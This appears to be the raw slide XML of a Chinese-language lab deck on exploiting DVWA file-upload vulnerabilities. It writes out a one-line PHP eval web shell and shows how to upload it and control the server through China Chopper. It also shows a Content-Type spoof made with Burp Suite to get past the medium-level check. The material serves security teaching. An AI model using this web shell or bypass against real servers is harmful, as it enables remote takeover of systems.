              <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
              <a:ea typeface="黑体" panose="02010609060101010101"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00" y="1325245"/>
            <a:ext cx="10972165" cy="43688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8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322000" y="2028825"/>
            <a:ext cx="7560000" cy="3382105"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>
    <p:random/>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0800000" cy="529907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zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2、查看源代码，分析漏洞利用方法</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sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>可以看到，没有经过任何过滤，直接将文件上传上去，并且提示了文件存放的路径，因此可以上传一句话木马进行漏洞利用。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
              <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>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7" name="图片 -2147482610"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2322000" y="1843405"/>
            <a:ext cx="7560000" cy="3659045"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="80" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId6"/>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720000" y="1325245"/>
            <a:ext cx="10800000" cy="34245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、编写一句话木马文件，并上传一句话木马文件</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）在客户机上，打开记事本输入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-lt"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>&lt;?php @eval($_POST['pass']);?&gt;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，然后另存为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-lt"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>shell.php</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-lt"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Browser...</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”按钮，选择文件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-lt"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>shell.php</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a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2"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r>
              <a:rPr lang="zh-CN" altLang="en-US"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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-lt"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Upload</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”按钮，上传文件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-lt"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>shell.php</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成功。</a:t>
            </a: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eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="CC0000"/>
              </a:buClr>
              <a:buSzTx/>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3"/>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962275" y="3019425"/>
            <a:ext cx="6267450" cy="1104900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId8"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId9"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2957195" y="4824095"/>
            <a:ext cx="6276975" cy="1514475"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>
    <p:random/>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1179810" cy="102997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、使用中国菜刀（chopper.exe）</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）在客户机上，打开中国菜刀，进入如下界面，按右键，点击“添加”。</a:t>
            </a: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1372870" y="2391410"/>
            <a:ext cx="9720000" cy="3098250"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>
    <p:rand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1179810" cy="102997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、使用中国菜刀（chopper.exe）</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
              <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" eaLnBrk="0" fontAlgn="auto"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）此时会弹出一个添加</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-lt"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>shell</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的对话框，然后填写相关的数据。</a:t>
            </a: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ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-lt"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>http://192.168.1.201/dvwa/hackable/uploads/shell.php</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是连接的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-lt"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>URL</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，就是网站的主路径加上上传文件时回显的保存路径。</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ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-lt"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>pass</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是菜刀连接时的密码，就是一句话木马提交的数据（这里为“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-lt"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>pass</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3505835" y="2287270"/>
            <a:ext cx="4800600" cy="2867025"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>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0" name="文本框 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="499110" y="1320165"/>
            <a:ext cx="11002010" cy="1273175"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:sp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    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、启动AWVS</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:cs typeface="+mn-ea"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="CC0000"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>    在Kali Linux中，打开浏览器访问https://192.168.66.128:3443/，进入AWVS主界面。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
              <a:ea typeface="黑体" panose="02010609060101010101"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21" name="图片 90"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1838325" y="2705735"/>
            <a:ext cx="8216265" cy="3123565"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8"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1179810" cy="94361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、使用中国菜刀（chopper.exe）</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）填写完成后，点击“添加”按钮，可以看到连接成功的界面。</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1417955" y="2390140"/>
            <a:ext cx="9720000" cy="3105844"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>
    <p:random/>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1362055" cy="101282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、使用中国菜刀（chopper.exe）</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）鼠标指向</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-lt"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>URL</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，然后双击或者右击选择“文件管理”，进入文件管理界面。</a:t>
            </a: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sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>可以看到整个网站的结构和文件，可以进行任意的增删改查，可以远程控制服务器。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
              <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>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ow级别的文件上传漏洞利用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5" name="图片 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId6"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1431290" y="2386330"/>
            <a:ext cx="9720000" cy="3105844"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>
    <p:random/>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6000" y="1247775"/>
            <a:ext cx="10817860" cy="5464810"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0" eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="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1</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400">
                <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:cs typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、分析medium级别文件上传源代码代码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r>
              <a:rPr sz="2400">
                <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:cs typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:cs typeface="黑体" panose="02010609060101010101"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sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>查看源代码</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400">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0" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="CC0000"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="2400" b="1">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="457200" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="CC0000"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" sz="2400">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="CC0000"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" sz="2400">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-609600" algn="l" eaLnBrk="0" fontAlgn="auto" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="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3313634920"/>
                </a:ext>
              </a:extLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>可以看到，服务器对上传文件的类型</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>和大小</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>做了限制。只允许上传文件类型是image/jpeg或image/png，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>并且文件大小小于 100000 字节。</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2" name="图片 -2147482607"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId5"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3355200" y="2095818"/>
            <a:ext cx="5488305" cy="3786505"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>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6000" y="1247775"/>
            <a:ext cx="10817860" cy="127571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1</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400">
                <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:cs typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、分析medium级别文件上传源代码代码</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
              <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
              <a:cs typeface="黑体" panose="02010609060101010101" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" eaLnBrk="0" fontAlgn="auto" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="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上传shell.php文件</a:t>
            </a:r>
            <a:endParaRPr sz="2400" b="1">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发现无法上传，而且提示只接受JPEG or PNG格式的图像。</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952750" y="2671445"/>
            <a:ext cx="6286500" cy="1514475"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>
    <p:random/>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576000" y="1247775"/>
            <a:ext cx="10817860" cy="133604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1</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400">
                <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:cs typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、分析medium级别</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2400">
                <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:cs typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>文件上传</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400">
                <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:cs typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>源代码代码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）抓包修改上传文件类型</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zh-CN" altLang="en-US" sz="2400">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>在</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Burp</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Suite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>中</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>设置为</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>拦截</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>状态下，重新上传文件，</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>拦截</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>上传包。</a:t>
            </a:r>
            <a:endParaRPr sz="2400" b="1">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322000" y="2610000"/>
            <a:ext cx="7560000" cy="4050522"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="bg1">
                <a:lumMod val="75000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>
    <p:rand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575945" y="1247775"/>
            <a:ext cx="11370310" cy="133604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1</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400">
                <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:cs typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、分析medium级别</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2400">
                <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:cs typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>文件上传</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400">
                <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:cs typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>源代码代码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）抓包修改上传文件类型</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sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>第2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>行是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>文件类型</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>将</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200">
                <a:latin typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>application/octet-stream</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>修改为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>image/jpeg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
